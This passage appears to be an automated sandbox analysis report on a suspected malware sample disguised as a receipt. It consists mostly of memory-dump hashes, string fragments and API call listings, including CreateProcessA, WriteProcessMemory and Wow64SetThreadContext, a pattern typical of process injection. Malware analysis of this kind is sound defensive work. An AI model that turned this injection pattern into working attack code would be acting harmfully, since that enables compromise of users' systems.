                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: 3411BE75504240CFDF06CF54D9C4B15BBB1FB44A24F24C6A9DC094B256C33AD44ACB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: afecc02ece3c17f332c3db816a1c6fa470af7c2f4823b143948815e5b98065fd
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: 1911BEB5508240CFDF16CF54D5C4B15BBA1FB44614F24C6A9D8494B252C33AD40ACB51

                                                                  Execution Graph

                                                                  Execution Coverage:10.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:197
                                                                  Total number of Limit Nodes:7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (odq$(odq$,hq$,hq$Hhq
                                                                  • API String ID: 0-2569284993
                                                                  • Opcode ID: 4959805311feb9b874b25c8e089f3c9faacc7478e2ad9c8a18ce9992cc655c45
                                                                  • Instruction ID: 7e2188d012f6c265e64ddab08ff1e7cd9e8edd7c5b1846f57a0952eef8802fcc
                                                                  • Opcode Fuzzy Hash: 4959805311feb9b874b25c8e089f3c9faacc7478e2ad9c8a18ce9992cc655c45
                                                                  • Instruction Fuzzy Hash: C3527F34B00255EFDB54DF79C484A6EBBB2BF88711F158169E9069B3A2CB31DD42CB90

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: d20d19022ce96cb71e96335f27f9054e55ea566be166f83b6a81ceb88dbde173
                                                                  • Instruction ID: f4bd773d9e94a346fd880a268a81539d03ac3d13fece848eab392ad0489d340f
                                                                  • Opcode Fuzzy Hash: d20d19022ce96cb71e96335f27f9054e55ea566be166f83b6a81ceb88dbde173
                                                                  • Instruction Fuzzy Hash: 7562DF74E01228CFDB65DF69C984BEEBBB2BB49301F1481EAD409A7255DB309E85CF50

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11a2ad75112a1ed85c2948ed0e4b287c5ee2689b795ce9d238b4c8504e4ced7c
                                                                  • Instruction ID: f8caa1777f0d19d4a0f9565f9308594926bd69ec93ca04d5262686cf2a1349d9
                                                                  • Opcode Fuzzy Hash: 11a2ad75112a1ed85c2948ed0e4b287c5ee2689b795ce9d238b4c8504e4ced7c
                                                                  • Instruction Fuzzy Hash: CA13C874A11219CFDB25DF64C898B99B7B1FF89300F1182E9E8096B361DB71AE85CF44

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75321dbc74978b8e52d816d763a19d44cd5e1a4d5efe12f365c53be6e0379b37
                                                                  • Instruction ID: bd2d32b6b908a7bbeace79ba77325916870e4d4a32d514dcddb8fad2a4fa2646
                                                                  • Opcode Fuzzy Hash: 75321dbc74978b8e52d816d763a19d44cd5e1a4d5efe12f365c53be6e0379b37
                                                                  • Instruction Fuzzy Hash: A713C874A11219CFDB15DF64C898B99B7B1FF89300F2182E9E8096B361DB71AE85CF44

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'dq$F$R$phq
                                                                  • API String ID: 0-3172865906
                                                                  • Opcode ID: 6d4eb6b5405ebbaa378c0b09cdf069d4c5bd899d5864de92b4779964a26ddcc4
                                                                  • Instruction ID: 33888b4e97d9239f494d5086c9b3966732be257df3178673051b59461ab1d6e9
                                                                  • Opcode Fuzzy Hash: 6d4eb6b5405ebbaa378c0b09cdf069d4c5bd899d5864de92b4779964a26ddcc4
                                                                  • Instruction Fuzzy Hash: FDD104B6600114EFDB06DFA8C984D69BBB6FF49314B1680A9E6099F272C732EC51DF50

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq$Hhq$Hhq
                                                                  • API String ID: 0-327223379
                                                                  • Opcode ID: cc1239efcb787f3b8dbeac21e552dbf13164b3d8f02795c3d17d639a925c4811
                                                                  • Instruction ID: 535f417d21c72ed8152b605a69f8260903cf59a7d15df8b6b75da8ff42119ace
                                                                  • Opcode Fuzzy Hash: cc1239efcb787f3b8dbeac21e552dbf13164b3d8f02795c3d17d639a925c4811
                                                                  • Instruction Fuzzy Hash: 2741E0347002518BDBA9AF79A42462E77E7AFC4306B54487DD606CB786DF28DD03C721

                                                                  Control-flow Graph: function starting at 73c9250, no calls to other functions (rendered executed/not-executed graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8hq$8hq$8hq
                                                                  • API String ID: 0-1838490158
                                                                  • Opcode ID: c75bcda0af016a9cbc0445bbf592162ab24990bb32b9d01272021e00680cdd23
                                                                  • Instruction ID: 82de481df02c57db2a229f11e96bf65bdb81603eb18806988507389b698e0e53
                                                                  • Opcode Fuzzy Hash: c75bcda0af016a9cbc0445bbf592162ab24990bb32b9d01272021e00680cdd23
                                                                  • Instruction Fuzzy Hash: 5731C4F4A1420ADBEB00DA94C45177E77B9EB89300F53445ED94AE7BC1DB366C0287A6

                                                                  Control-flow Graph: function starting at 73c839f, no calls to other functions (rendered executed/not-executed graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$$dq$$dq
                                                                  • API String ID: 0-2227312764
                                                                  • Opcode ID: 37a76c2a6acd216e1f5a0c2205a2ca04df66234d93a43ef4511a6f1369367a6d
                                                                  • Instruction ID: 289d3dd50df5fa8d216482a3e1f8056635e4d174bfc5858a1351a44e1259107a
                                                                  • Opcode Fuzzy Hash: 37a76c2a6acd216e1f5a0c2205a2ca04df66234d93a43ef4511a6f1369367a6d
                                                                  • Instruction Fuzzy Hash: F301DBF0B50209CBF724CA24CC567E97665BB40700F144869DE099F6C1DAA55E50C791

                                                                  Control-flow Graph: function starting at 73c2ad8, calling 73c20d8, 73c22f0, 73c2418 and 73c16cc (rendered executed/not-executed graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq$Hhq
                                                                  • API String ID: 0-2633903351
                                                                  • Opcode ID: 05c63f2f9989663a17a4d2082f0b1363f840e1741a7cb6316687ec1523dc4ce1
                                                                  • Instruction ID: a1001d0e0608a10c77e3f841534ee611a4c97687eca08fdc085b068b83293802
                                                                  • Opcode Fuzzy Hash: 05c63f2f9989663a17a4d2082f0b1363f840e1741a7cb6316687ec1523dc4ce1
                                                                  • Instruction Fuzzy Hash: D27191B5A002199FEB14DF69D8046AFBBE6FF88310F14842DD549A7380DB389D46CBA5

                                                                  Control-flow Graph: function starting at 563e948, calling 563dcf8 and 563dd04 (rendered executed/not-executed graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq$Hhq
                                                                  • API String ID: 0-2450388649
                                                                  • Opcode ID: 0dc08324dce785ecaab6cba92284a1828ef6c8195de4fe2b036c9658cfda1fcd
                                                                  • Instruction ID: da68fb5d3e815cd5c8126ca96cda42e59bc4e0fb2c0f2f662c55e5ef836dca62
                                                                  • Opcode Fuzzy Hash: 0dc08324dce785ecaab6cba92284a1828ef6c8195de4fe2b036c9658cfda1fcd
                                                                  • Instruction Fuzzy Hash: AD816C74E003589FCB08DFA9C9956EEBBF6FF88300F54856AE409AB350DB345945CBA1

                                                                  Control-flow Graph: function starting at 73c82d0, calling 73c839f (rendered executed/not-executed graph not reproduced)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 5a5a009a213f3b296b74cc264415be61b4210e6500b0f6c3c8087990ff46577e
                                                                  • Instruction ID: 04c02f38856d48d97d1ea95bed8a0a510445d5e055023a3ccd66b5ee072b0442
                                                                  • Opcode Fuzzy Hash: 5a5a009a213f3b296b74cc264415be61b4210e6500b0f6c3c8087990ff46577e
                                                                  • Instruction Fuzzy Hash: 3511C4F4919219CFE350DB28D9082E6BBB9BB06344F1842AFD40DD7A42D7718F46C7A6
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07655FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 81b70471b68c06d2e0fa183d9f07bef40915b9e646f71019a61519f8359069a8
                                                                  • Instruction ID: c83b5044a0a8e3491f526df3fbb93c10deff42afdfba701456c6e8bf648aed07
                                                                  • Opcode Fuzzy Hash: 81b70471b68c06d2e0fa183d9f07bef40915b9e646f71019a61519f8359069a8
                                                                  • Instruction Fuzzy Hash: 92A18DB1D0031ADFDB20CF68C945BEDBBB2BF48310F1481A9D84AA7240DB749995DF92
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07655FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 645ee7e05e3491c94eb90d6116f2362c68997b53d2f856fa822005c3768d0a74
                                                                  • Instruction ID: 8c59f9c25ef42fbc8d8fd541f0530aebf02ace8044f740d11973dd71a47605ea
                                                                  • Opcode Fuzzy Hash: 645ee7e05e3491c94eb90d6116f2362c68997b53d2f856fa822005c3768d0a74
                                                                  • Instruction Fuzzy Hash: C9917CB0D0031ACFDB24CFA8C944BEDBBB2BF48314F0481A9D84AA7250DB749995DF91
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 273bf80712212270f1b2ef7fe687f896ee3db1d0fcd04e275c2f09b6e3154a2f
                                                                  • Instruction ID: 266f7e1f789c23d6b1cc9a4cdbcb6582dfcda2650e88e1b9da6de07570278457
                                                                  • Opcode Fuzzy Hash: 273bf80712212270f1b2ef7fe687f896ee3db1d0fcd04e275c2f09b6e3154a2f
                                                                  • Instruction Fuzzy Hash: DF918A70A00B048FD765DF29D441B5ABBF2FF88708F008A2ED88AD7A55D774E945CB90
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: a252bd28f4c86525e2613f3b56c7530c232d3c6075591664f3e2b3b3249548bb
                                                                  • Instruction ID: 1ae34ddb944df0ced7746281c52050c0527ad899b10d730c86221984f6b8611d
                                                                  • Opcode Fuzzy Hash: a252bd28f4c86525e2613f3b56c7530c232d3c6075591664f3e2b3b3249548bb
                                                                  • Instruction Fuzzy Hash: D141E0B0C0071DCBDB24DFA9C884B9EBBF5BF49708F20806AD409AB255DB756949CF90
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 13a2aca29f0ddd03caaaeea2231dd4f8889436409f0d132367c4be9803618ff0
                                                                  • Instruction ID: 44f803c0fff70b4d77059530be0088176fed0c775bf69767da4aee4fca2b29b6
                                                                  • Opcode Fuzzy Hash: 13a2aca29f0ddd03caaaeea2231dd4f8889436409f0d132367c4be9803618ff0
                                                                  • Instruction Fuzzy Hash: 8441DFB0C00719CBDB25DFA9C884BDDBBB1BF49704F20806AD419AB255DB756949CF90
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07655B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: e2da4f2d864d8af726f9867ffd138a51133ccd7bbba30a6b1c6745490cd02030
                                                                  • Instruction ID: 1d149b19c56488884e43b66c70b96cfb9982084b97215b3d2248af36d8d343ae
                                                                  • Opcode Fuzzy Hash: e2da4f2d864d8af726f9867ffd138a51133ccd7bbba30a6b1c6745490cd02030
                                                                  • Instruction Fuzzy Hash: A52146B19003499FCB10DFA9C885BEEBBF5FF48320F10842AE959A7241C7789954DBA5
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07655B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 2e6a22685b5f1894bb6e9f6090bc4476afb73853f4b0b2606d331888dcf3439a
                                                                  • Instruction ID: b3689f1627143083bc8a232d93a1973e2ed4dfaeed6c64665f4271e7ec38b899
                                                                  • Opcode Fuzzy Hash: 2e6a22685b5f1894bb6e9f6090bc4476afb73853f4b0b2606d331888dcf3439a
                                                                  • Instruction Fuzzy Hash: BF2127B19003499FCF10DFA9C885BDEBBF5FF48310F108429E959A7241C7789954DBA5
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07655C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 06dc294303bfe4e96717c2d7a9a8ab7d5f2c3f7cc7bf32f802b460b33a4ecab6
                                                                  • Instruction ID: 23c8df2d1677c844829696d988c0b6e19df73e3a4014c225401a65f5f802e202
                                                                  • Opcode Fuzzy Hash: 06dc294303bfe4e96717c2d7a9a8ab7d5f2c3f7cc7bf32f802b460b33a4ecab6
                                                                  • Instruction Fuzzy Hash: CC2127B18003499FCB10DFAAC885AEEFBF5FF48320F14842DE559A7241C7349950DBA1
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0765559E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 919bc13e152a66bcf7b418eaede833336a02b1a061cc7dda99ac4a6c526d572d
                                                                  • Instruction ID: 1f02dcf1ca2d90a1dc5be697af90dfc8e0485f588b843b4c43d28610c6dbd54f
                                                                  • Opcode Fuzzy Hash: 919bc13e152a66bcf7b418eaede833336a02b1a061cc7dda99ac4a6c526d572d
                                                                  • Instruction Fuzzy Hash: 6F2159B19003099FDB10DFAAC4857EEBBF5EF48324F148429D45AA7241DB789945CFA1
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D78E,?,?,?,?,?), ref: 0135D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 95e917dae17b8669c3b3d2a264cd68ac53d4da5013a9ab5fd13240e6b6f34ef3
                                                                  • Instruction ID: d180f29982db674beff3417074cc2f4cbcd80cc632793e2592a637bdced613f6
                                                                  • Opcode Fuzzy Hash: 95e917dae17b8669c3b3d2a264cd68ac53d4da5013a9ab5fd13240e6b6f34ef3
                                                                  • Instruction Fuzzy Hash: 9821E5B5900348AFDB10CF9AD884ADEBFF4EB48714F14841AE918A3350D374A954CFA1
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D78E,?,?,?,?,?), ref: 0135D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 2dc5cdd26e2d71a026aec7851108f4f7ab6e00cedec12f7c6ae2833ff444c296
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5ea6349aeb96a4aca552862fb1ad45df5c292853d73b0c754f711e18ffb0b91
                                                                  • Instruction ID: 230868c5022cddfc2a45db2c93cd613cfb99949435b8541638fc54279ef09055
                                                                  • Opcode Fuzzy Hash: a5ea6349aeb96a4aca552862fb1ad45df5c292853d73b0c754f711e18ffb0b91
                                                                  • Instruction Fuzzy Hash: DE42F330E1061DCFDB54EFA8C8446DCBBB1BF49300F5182AAD5497B265EB309A99CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 91bdc917a95e35725e544b13a2e093059bb75b3247341d2911bf13711f3dabd4
                                                                  • Instruction ID: cdf130de55dd067ecd6d84f0a3ac3112e25951ca227cbbf5430a4554de9edd1e
                                                                  • Opcode Fuzzy Hash: 91bdc917a95e35725e544b13a2e093059bb75b3247341d2911bf13711f3dabd4
                                                                  • Instruction Fuzzy Hash: 9E225CB0905F424AE7B45FA4848C39EB6A0AB05715FB04A6FC2FACA357D7349187CF49
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6ba6e1179c29f0d533d41c4db1ba536f610d07bc13fd369b7280ff39fbccdd3
                                                                  • Instruction ID: 928d85066e81d0cb0e8b3e48c733c6672a14fa909e9c9fb6b3a1fb6abb278d12
                                                                  • Opcode Fuzzy Hash: c6ba6e1179c29f0d533d41c4db1ba536f610d07bc13fd369b7280ff39fbccdd3
                                                                  • Instruction Fuzzy Hash: F0B10FF1B14206DFEB15EB64C5496BEBFB5EF42300F5584ADD44AA3295EA31CC248B83
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d5a0b49cab48a4ef5bec4cda9cca7dd02354dff644c85ced8b6abc2d63d4e13b
                                                                  • Instruction ID: e445e9fee49d82c2cd843fd5cad7bc562deb2c9b2ba9d3bfa1c1909f816ff45f
                                                                  • Opcode Fuzzy Hash: d5a0b49cab48a4ef5bec4cda9cca7dd02354dff644c85ced8b6abc2d63d4e13b
                                                                  • Instruction Fuzzy Hash: 7BD1F875B002589FEB00EFB8D4556AE7BF5EF84300F1488A9D9499B386CB349D46C7D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b7d6913aa783a8331ba812cb4c7a26f67bb8e079f91012ae32e9fcb53e590cc3
                                                                  • Instruction ID: 3dcd9bb543995734f244742b8e779685e9d36e2ec730ac5f8b458a020125ec36
                                                                  • Opcode Fuzzy Hash: b7d6913aa783a8331ba812cb4c7a26f67bb8e079f91012ae32e9fcb53e590cc3
                                                                  • Instruction Fuzzy Hash: AFB1CB71A00209CFEB61DFA9C9506AEFFB2FF88311F20452EC609A7242DB309D56CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e7e1a6f02718d63fed1e3118596c6279458af461d2dc3f9f7355b69b4d06b529
                                                                  • Instruction ID: 43269449e7424ac220d4c801771ed4da6a6514fe71141de6d91f473819aa8fd2
                                                                  • Opcode Fuzzy Hash: e7e1a6f02718d63fed1e3118596c6279458af461d2dc3f9f7355b69b4d06b529
                                                                  • Instruction Fuzzy Hash: 7DF1C771D1061ACBCF14DFA8C854AEEB7B5FF49300F1086AAD549B7254EB70AA85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfa4d9f9e981f4c5870f99ea552db57f352cf7d2aa44f1dc754a5411d507c9da
                                                                  • Instruction ID: 5bd01c75eed00d7e3913a11c7fcb83951be19bd0adab954c0346c585f2612f9f
                                                                  • Opcode Fuzzy Hash: dfa4d9f9e981f4c5870f99ea552db57f352cf7d2aa44f1dc754a5411d507c9da
                                                                  • Instruction Fuzzy Hash: BDE1C671D1061ACBCF14DFA8C854AEDBBB5BF49300F1086AAD549B7254EB70AA85CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 97fffbdda1d55bf6a3bf1d271c4fd0e522d03d727d7c527a2c1e72fc0a26520d
                                                                  • Instruction ID: c4a2ca4f7c13b43503a4e8999bfe2019a5d0363f65c96204aae14c34665f9ba9
                                                                  • Opcode Fuzzy Hash: 97fffbdda1d55bf6a3bf1d271c4fd0e522d03d727d7c527a2c1e72fc0a26520d
                                                                  • Instruction Fuzzy Hash: 6CB13835A106148FDB44DF69D494AAEBBF6EF88701F5540B9E606EB3A2CB30DD42CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
